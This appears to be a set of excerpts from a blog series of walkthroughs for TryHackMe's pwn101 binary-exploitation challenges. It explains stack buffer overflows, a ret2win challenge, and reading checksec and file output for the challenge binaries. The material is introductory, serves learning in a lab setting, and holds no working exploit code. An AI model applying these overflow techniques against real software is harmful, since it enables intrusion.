102 Intoroduction So for the next challenge we are required to modify a variable’s value. This occurs when data larger than the allocated memory space (buffer) is written into that buffer. As a result, it can overwrite adjacent memory, including variables. But then if the stack grows downwards and the return address is above the variables space it should write the the memory below and not above, right? No, what happens is functions called later get stack frames at lower memory, and the return address is pushed to the higher address than the local variables.

103 Introduction Here we are met by a ret2win challenge, what this means is that we are required to call a function which does something that is not normal, example spawn a shell or in case of a CTF it prints out the flag. We can start by doing simple binary analysis for example checking the binary protections using checksec. Let us break all this down bit by bit. Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) Arch: amd64-64-little This line specifies the architecture of the binary.

104 Introduction First of all we are going to do some file checks, to see the binary protections and determine the file type pwn104.pwn104: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=60e0bab59b4e5412a1527ae562f5b8e58928a7cb, for GNU/Linux 3.2.0, not stripped We can see that the binary is a 64 bit Least Significant Byte executable, in other words it uses little endian. The binary is dynamically linked to a LIBC and it is not stripped.

Hello guys and welcome to my walkthrough along this journey of binary exploitation. In this wreiteup we shall be handling the pwn101 room on tryhackme. Before jumping into this room, there are some prerequisites to complete the challenges: 1. C programming language 2. Assembly language (basics) 3. Some experience in reverse engineering, using debuggers, understanding low-level concepts 4. Python scripting and pwntools 5. A lot of patience Let’s learn. 101 Introduction So we first begin with some easy task, I reckon it is gonna be a buffer overflow, I will explain this in the analysis parts.